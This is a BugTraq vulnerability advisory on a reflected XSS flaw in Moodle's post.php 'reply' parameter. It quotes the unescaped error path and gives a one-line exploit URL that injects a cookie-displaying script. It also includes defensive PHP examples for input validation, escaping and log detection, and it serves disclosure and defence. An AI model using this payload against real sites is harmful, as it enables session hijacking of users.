BugTraq
xss in moodle (post.php) Aug 06 2004 09:23PM
Javier Ubilla Brenni (javierubilla spymac com)


+--------------------------------+
|                                |
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Author: Javier Ubilla Brenni <javierubilla[at]spymac.com>

Date: 02/08/04

Software Description:
~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses."

www.moodle.org

Bug:
~~~

post.php is vulnerable to an XSS attack.

The bug was found in the $reply variable:

/* Begin of vulnerable code */

} else if (isset($reply)) { // User is writing a new reply

    if (! $parent = forum_get_post_full($reply)) {
        error("Parent post ID was incorrect ($reply)");
    }

    if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {
        error("This post is not part of a discussion! ($reply)");
    }

    if (! $forum = get_record("forum", "id", $discussion->forum)) {
        error("The forum number was incorrect ($discussion->forum)");
    }

    if (! $course = get_record("course", "id", $discussion->course)) {
        error("The course number was incorrect ($discussion->course)");
    }

    if (! forum_user_can_post($forum)) {
        error("Sorry, but you can not post in this forum.");
    }

    if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {
        if (groupmode($course, $cm) and !isteacheredit($course->id)) { // Make sure user can post here
            if (mygroupid($course->id) != $discussion->groupid) {
                error("Sorry, but you can not post in this discussion.");
            }
        }

        if (!$cm->visible and !isteacher($course->id)) {
            error(get_string("activityiscurrentlyhidden"));
        }
    }

/* End of vulnerable code */

Here is the bug:

    if (! $parent = forum_get_post_full($reply)) {
        error("Parent post ID was incorrect ($reply)");

$reply is taken straight from the request (the exploit below supplies it as a query parameter). When no post with that id exists, the raw value is interpolated into the error message and sent back to the browser without being HTML-escaped, so any markup it carries is rendered in the victim's session.
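To show the fix a maintainer would apply, here is an added example that is not Moodle's code and not part of this advisory. It places the unescaped error path described above next to a hardened version that first validates the post id as a positive integer and then HTML-escapes anything it echoes. The function names (vulnerable_error_page, validate_post_id, hardened_error_page, handle_reply) are hypothetical, and the assumption is that the real reply branch would pass the validated integer on to forum_get_post_full().

```php
<?php
// Added example, not Moodle's code: the unescaped error path described in the
// advisory next to a hardened handler. Function names are hypothetical.

// Vulnerable behaviour: the raw request value is interpolated into the HTML
// error page, so markup in $reply is rendered by the victim's browser.
function vulnerable_error_page(string $reply): string
{
    return "<p>Parent post ID was incorrect ($reply)</p>";
}

// A post id is a positive integer; anything else is rejected before it reaches
// forum_get_post_full() or the page. Returns null for invalid input.
function validate_post_id(string $reply): ?int
{
    $id = filter_var($reply, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Whatever is echoed back is HTML-escaped, so even the rejected value cannot
// introduce tags or break out of an attribute.
function hardened_error_page(string $reply): string
{
    $safe = htmlspecialchars($reply, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Parent post ID was incorrect ($safe)</p>";
}

// Stand-in for the reply branch of post.php (assumption: the real code would
// now call forum_get_post_full($id) with a known-integer id).
function handle_reply(array $params): string
{
    if (!isset($params['reply'])) {
        return 'no reply parameter';
    }
    $raw = (string) $params['reply'];
    $id  = validate_post_id($raw);
    if ($id === null) {
        return hardened_error_page($raw);
    }
    return "replying to post $id";
}

// Constructed inputs: a legitimate id, a value carrying HTML, a negative number.
foreach (['42', 'abc<b>x</b>', '-1'] as $input) {
    echo "input: $input\n";
    echo "  vulnerable: " . vulnerable_error_page($input) . "\n";
    echo "  hardened:   " . handle_reply(['reply' => $input]) . "\n";
}
```

Run it with php on the command line. The value carrying HTML comes back from the vulnerable function with its tags intact, while the hardened path rejects it as a post id and, in the message it does return, shows it as `abc&lt;b&gt;x&lt;/b&gt;`. Validation and escaping are kept as two separate steps on purpose: the integer check protects the database lookup, the escaping protects the page, and neither one alone covers both.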

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
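From the defender's side, a request like the one above stands out in the web server log because the reply parameter is not a numeric post id. The following added example (not part of the advisory and not Moodle code) scans Apache-style access log lines for requests to mod/forum/post.php whose reply value fails an integer check. The three log lines are constructed for the example and the function name suspicious_reply_requests is hypothetical.

```php
<?php
// Added example, not from the advisory or Moodle: scan Apache-style access log
// lines for requests to mod/forum/post.php whose reply parameter is not an
// integer post id. The log lines below are constructed.
$lines = [
    '10.0.0.5 - - [06/Aug/2004:21:23:00 +0000] "GET /moodle/mod/forum/post.php?reply=17 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [06/Aug/2004:21:24:10 +0000] "GET /moodle/mod/forum/post.php?reply=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 1042',
    '10.0.0.9 - - [06/Aug/2004:21:24:11 +0000] "GET /moodle/mod/forum/view.php?id=3 HTTP/1.1" 200 8801',
];

function suspicious_reply_requests(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // Pull the request target out of the quoted request line.
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $url = parse_url($m[1]);
        if (!isset($url['path'], $url['query'])
            || !preg_match('#/mod/forum/post\.php$#', $url['path'])) {
            continue;
        }
        parse_str($url['query'], $q); // also URL-decodes the values
        if (isset($q['reply']) && filter_var($q['reply'], FILTER_VALIDATE_INT) === false) {
            $hits[] = [
                'client' => explode(' ', $line, 2)[0],
                'reply'  => $q['reply'],
            ];
        }
    }
    return $hits;
}

foreach (suspicious_reply_requests($lines) as $hit) {
    printf("client %s sent non-numeric reply parameter: %s\n", $hit['client'], $hit['reply']);
}
```

Only the second line is reported. Matching on "not an integer" rather than on a list of script tags catches encoded and obfuscated variants alike, because the check mirrors the validation the application itself should perform; the same rule can be carried into a WAF or SIEM query.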

Solution:
~~~~~~~~~

Upgrade to the latest version.

Vendor Status:
~~~~~~~~~~~~~~

Notified.

Credits:
~~~~~~~

Bug found by Javier Ubilla and Ariel.
